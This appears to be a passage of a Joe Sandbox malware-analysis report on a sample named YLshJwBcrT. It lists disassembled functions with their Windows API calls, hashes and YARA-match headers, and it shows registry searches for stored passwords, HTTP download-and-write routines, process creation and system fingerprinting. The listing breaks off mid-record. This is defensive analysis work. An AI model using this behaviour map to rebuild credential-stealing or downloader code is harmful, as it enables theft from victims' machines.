                                  • Instruction ID: da5286b6c1f4342075c09c9871d0a00fb238edcb978981ae55dbee23abb1ddda
                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                  • Instruction Fuzzy Hash: E081C4B5960318ABCB54EBE0CD51FEDB33AAF54304F0041B8A30A66185EF746B88CF59
                                  Function 022F0CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • memset.MSVCRT ref: 022F0E83
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                  • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                  • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                                  • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                                  • lstrlen.KERNEL32(?), ref: 022F0F0E
                                  • memset.MSVCRT ref: 022F0F34
                                  • memset.MSVCRT ref: 022F0F48
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID:
                                  • API String ID: 1395395982-0
                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                  • Instruction ID: ac176967de5fb3867c6909c9e6af5ed693eddf65447b3a085c33d8ad4c29ab4d
                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                  • Instruction Fuzzy Hash: 0061C2B5520318ABCB14EBE0CD55FEDB33AAF54304F0041A9E70A66085EF746B88CF59
                                  Function 022E4AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E4B7C
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E4BA1
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E4D21
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022E504F
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E506B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E507F
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E50B0
                                  • InternetCloseHandle.WININET(00000000), ref: 022E5114
                                  • InternetCloseHandle.WININET(00000000), ref: 022E512C
                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E4D7C
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • InternetCloseHandle.WININET(00000000), ref: 022E5136
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID:
                                  • API String ID: 2402878923-0
                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                  • Instruction ID: 428fb1100e1cadadf9836ee14c8428e5761dbd7bdab5e8ca480bdcbb685a5d21
                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                  • Instruction Fuzzy Hash: B4120172920318AADB55EBD4DD61FEEF37ABF24700F5041A9A20A62194DF742F88CF51
                                  Function 022E64E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022E6664
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E66D4
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6756
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6760
                                  • InternetCloseHandle.WININET(00000000), ref: 022E676A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID:
                                  • API String ID: 3074848878-0
                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                  • Instruction ID: 16035b640c0b77a34e830471f83ccd06d1a59b4b07deb65ff81c87adbe2a1765
                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                  • Instruction Fuzzy Hash: E1718175A60318ABDF24DFE0CC55BEEB779FB04700F5041A9E20A6B194DBB46A84CF41
                                  Function 022F9277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022F92D3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID:
                                  • API String ID: 2244384528-0
                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                  • Instruction ID: b0434be742c0746a594443f5d8fea33a4f3366bf1a05af96f231236494e43c4f
                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                  • Instruction Fuzzy Hash: 5271FBB9A50208ABDB14DFE4DC94FEEB7BAFF49700F108118F605A7294DB74A944CB61
                                  Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                  • memset.MSVCRT ref: 0041716A
                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                  • sA, xrefs: 00417111
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: OpenProcesslstrcpymemset
                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 224852652-2614523144
                                  • Opcode ID: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                  • Opcode Fuzzy Hash: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                  Function 022F7767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022F77A9
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022F77E6
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F786A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7871
                                  • wsprintfA.USER32 ref: 022F78A7
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$B
                                  • API String ID: 1544550907-183544611
                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction ID: 6f845194738d481f2f77a7ac568bb1bcdfb6103f691d242acdd6c4b18408c96a
                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction Fuzzy Hash: 42416EB1D50258AFDB10DFD4CC55BEEFBB9AF48700F0001A9E609A7284D7756A84CFA5
                                  Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                  • task.LIBCPMTD ref: 004076FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                  • Opcode Fuzzy Hash: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                  Function 022F1612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(?,?), ref: 022F1642
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                    • Part of subcall function 022F94C7: StrStrA.SHLWAPI(?,?), ref: 022F94D3
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F167E
                                    • Part of subcall function 022F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022F94F7
                                    • Part of subcall function 022F94C7: lstrlen.KERNEL32(?), ref: 022F950E
                                    • Part of subcall function 022F94C7: wsprintfA.USER32 ref: 022F952E
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F16C6
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F170E
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F1755
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F179D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F17E5
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F182C
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F1874
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                  • strtok_s.MSVCRT ref: 022F19B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                  • String ID:
                                  • API String ID: 4276352425-0
                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                  • Instruction ID: 18389550f3c9e082d2bd29bee8bc349f5229a06e593f3e1caf754dbf6cc559f3
                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                  • Instruction Fuzzy Hash: DE719BB6960318ABCB54EBF0DD88EEEB37A6F55300F0045ACE20DA2144EE755B84CF61
                                  Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00407314
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                  • task.LIBCPMTD ref: 00407555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                  • String ID: Password
                                  • API String ID: 2698061284-3434357891
                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                  Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcatA.KERNEL32(?,0088A6C0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                  • lstrcatA.KERNEL32(?,00885A38), ref: 00414847
                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                  • lstrcatA.KERNEL32(?,0088B408), ref: 0041486F
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID: 0aA
                                  • API String ID: 167551676-2786531170
                                  • Opcode ID: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                  • Opcode Fuzzy Hash: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                  Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0088A588,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0088A588,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                  • __aulldiv.LIBCMT ref: 00418172
                                  • __aulldiv.LIBCMT ref: 00418180
                                  • wsprintfA.USER32 ref: 004181AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2886426298-3474575989
                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                  Function 022E6307 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022E6376
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E63AE
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022E63F6
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022E641A
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 022E6443
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022E6471
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 022E64B0
                                  • InternetCloseHandle.WININET(?), ref: 022E64BA
                                  • InternetCloseHandle.WININET(00000000), ref: 022E64C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 4287319946-0
                                  • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
